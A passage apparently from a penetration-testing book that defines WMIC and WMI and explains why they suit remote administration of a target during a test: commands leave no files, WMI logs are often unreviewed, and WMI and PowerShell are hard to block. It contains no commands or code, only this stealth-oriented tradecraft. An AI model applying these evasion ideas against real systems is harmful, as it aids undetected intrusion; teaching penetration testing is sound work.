Let's get the basic definitions out of the way. WMIC is the name of a tool and it stands for Windows Management Instrumentation Command. The command part refers to a command line interface; presumably, WMICLI was deemed too long. The tool allows us to perform WMI operations. WMI is the Windows infrastructure for operations and management data. In addition to providing management data to other parts of Windows and other products altogether, it's possible to automate administrative tasks both locally and remotely with WMI scripts and applications. Often, administrators access this interface through PowerShell. Like all the other topics in this book, a proper treatment of all the power available to you via WMIC is out of scope for this discussion. There are great resources online and in bookstores for the curious reader.

For now, we're interested in this remote administration stuff I just mentioned. There are a couple important facts for us to consider as a pen tester:

• WMIC commands fired off at the command line leave no traces of software or code lying around. While WMI activity can be logged, many organizations fail to turn it on or review the logs. WMI is another Windows feature that tends to fly under the radar.
• In almost any Windows environment, WMI and PowerShell can't be blocked.

Bringing this together is this realization; we can use WMIC to remotely administer a Windows host while leveraging the target's PowerShell functionality.